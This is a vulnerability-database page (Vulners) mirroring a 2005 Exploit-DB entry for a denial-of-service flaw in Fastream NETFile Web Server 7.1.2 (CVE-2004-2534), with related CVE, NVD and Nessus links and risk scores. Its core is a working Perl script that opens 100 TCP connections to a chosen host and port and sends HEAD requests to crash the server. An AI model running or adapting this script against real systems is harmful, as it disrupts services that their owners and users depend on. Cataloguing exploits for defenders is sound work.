Lucene search
+L

Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service

🗓️ 16 Sep 2005 00:00:00Reported by karak0rsanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

Denial of Service exploit for Fastream NETFile Web Server 7.1.2 coded by karak0rsan.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2004-2534
25 Oct 200504:00
cve
cvelist
Cvelist
CVE-2004-2534
25 Oct 200504:00
cvelist
euvd
EUVD
EUVD-2004-2525
7 Oct 202500:30
euvd
nessus
Tenable Nessus
Fastream NETFile FTP/Web Server HEAD Request Saturation DoS
19 Nov 200400:00
nessus
nvd
NVD
CVE-2004-2534
31 Dec 200405:00
nvd
#Fastream NETFile FTP/Web Server 7.1.2 Professional DoS Exploit
#Bug found by bratax ck
#Coded bY karak0rsan
#d0gma.org // unuver.com
#Greetz:hurby,phalaposher,l4m3r,Atak,spymaster,razor...

$host=$ARGV[0];
$port=$ARGV[1];

if(!$ARGV[1]){
       print "Fastream FTP/Web Server DoS\n";
       print "Coded by karak0rsan // unuver.com\n";
       print "Usage:perl $0 [target] [port]\n";
}

use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Couldn't Connect!\n";;
close($socket);
if($socket){
       print "\n";
       print "[+]Attacking..!\n";
       }

for($i= 0; $i < 100; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
print $socket1 "HEAD / HTTP/1.0\r\n\r\n";
close($socket1);
}
print "Attack finished ;)\n";
exit();

#EoF

# milw0rm.com [2005-09-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Sep 2005 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.04139
48